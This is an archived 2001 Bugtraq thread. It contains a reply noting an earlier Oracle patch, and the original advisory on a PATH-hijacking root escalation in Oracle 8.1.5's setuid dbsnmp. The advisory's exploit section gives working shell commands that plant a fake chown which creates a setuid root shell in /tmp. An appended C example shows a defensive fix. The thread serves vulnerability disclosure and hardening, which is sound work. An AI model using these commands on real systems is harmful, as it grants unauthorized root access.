RE: Oracle 8.1.5 dbnsmp vulnerability
From: Aaron C. Newman (aaron@newman-family.com)
Date: 08/01/01
- In reply to: Ismael Briones: "Oracle 8.1.5 dbnsmp vulnerability"
- Next in thread: Theo Van Dinter: "Re: Oracle 8.1.5 dbnsmp vulnerability"
From: "Aaron C. Newman" <aaron@newman-family.com>
To: "Ismael Briones" <ismael@el-mundo.net>, <bugtraq@securityfocus.com>
Subject: RE: Oracle 8.1.5 dbnsmp vulnerability
Date: Wed, 1 Aug 2001 14:12:22 -0400
Message-ID: <MBEGJBCJPBGIOCKFMLLPIEAFCJAA.aaron@newman-family.com>
Funny to see Oracle's canned response to this. I'm not 100% sure this is
exactly the same problem, but I worked with them fixing what looks like the
same problem back in 1999. They provided a patch way back then - might be
that whoever responded to you is not "up to speed".
See the advisory dated August 23, 1999
http://xforce.iss.net/alerts/advise36.php
Aaron C. Newman
CTO/Founder
Application Security, Inc.
212-490-6022
anewman@appsecinc.com
www.appsecinc.com
-Protection Where It Counts-
-----Original Message-----
From: bugtraq-return-1460-aaron=newman-family.com@securityfocus.com
[mailto:bugtraq-return-1460-aaron=newman-family.com@securityfocus.com]On
Behalf Of Ismael Briones
Sent: Wednesday, August 01, 2001 1:14 PM
To: bugtraq@securityfocus.com
Subject: Oracle 8.1.5 dbnsmp vulnerability
Title: Vulnerability in dbsnmp in Oracle 8.1.5
Date: 01-08-2001
Platform: Only tested in Digital Unix.
Impact: Any user can gain root privileges
Author: Ismael Briones Vilar (ismael@el-mundo.net)
Status: Vendor Contacted, and they are investigating a fix.
PROBLEM SUMMARY:
There is a problem in dbsnmp that can be used by local users to obtain
root privileges. The dbsnmp is setuid root. When a user executes dbsnmp there
is a call to chown and chgrp, but without specifying the path, so any user can
define his PATH variable to exploit this vulnerability:
Probed in Oracle 8.1.5.
Oracle 8.1.6 is not vulnerable
IMPACT:
Any user with local access can gain root privileges
SOLUTION:
Maybe a chmod -s
STATUS:
Vendor was contacted 30/07/2001 and Oracle answered:
"We are investigating a fix as we speak."
EXPLOIT:
export PATH=~/bin/:$PATH
Then we create the file ~/bin/chown or ~/bin/chgrp:
#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX
(We have to put all in the same line, separated by semicolon)
We make our chown or chgrp executable:
chmod +x ~/bin/chown
chmod +x ~/bin/chgrp
When the user executes dbsnmp, the system looks for chown in the first
directory of the PATH variable, executes our chown file and we have a shell
setuid root in /tmp/XXX.
-------------------------
Ismael Briones Vilar
ismael@el-mundo.net
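
A defensive counterpart to the advisory above, as an added example that is not part of the original posts and is not Oracle's code: a privileged program that must start a helper runs it by absolute path with a fixed environment, so the caller's PATH is never consulted. The name run_fixed and the SAFE_ENV values are assumptions chosen for illustration.

```c
/* Added example (not from the original posts, not Oracle's code).
 * run_fixed and SAFE_ENV are hypothetical names; the environment values
 * are constructed for illustration. */
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to every child. The caller's PATH, IFS,
 * LD_* and similar variables never reach the helper. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", "IFS= \t\n", NULL };

/* Run a helper by absolute path only.
 * Returns the child's exit status (127 if the exec itself failed), or -1
 * if the path is not absolute or the child could not be started/reaped. */
int run_fixed(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/' || argv == NULL)
        return -1;                      /* refuse names resolved via PATH */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() takes the path literally; unlike execvp() or
         * system(), it never searches PATH. */
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* A bare "chown" is rejected outright instead of being looked up. */
    char *const bare[] = { "chown", "--version", NULL };
    if (run_fixed("chown", bare) != -1)
        return 1;

    /* The child sees only the fixed PATH, whatever the caller exported. */
    char *const chk[] = { "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL };
    return run_fixed("/bin/sh", chk) == 0 ? 0 : 1;
}
```

For ownership changes specifically, calling chown(2) or fchown(2) directly from the program avoids spawning a helper at all.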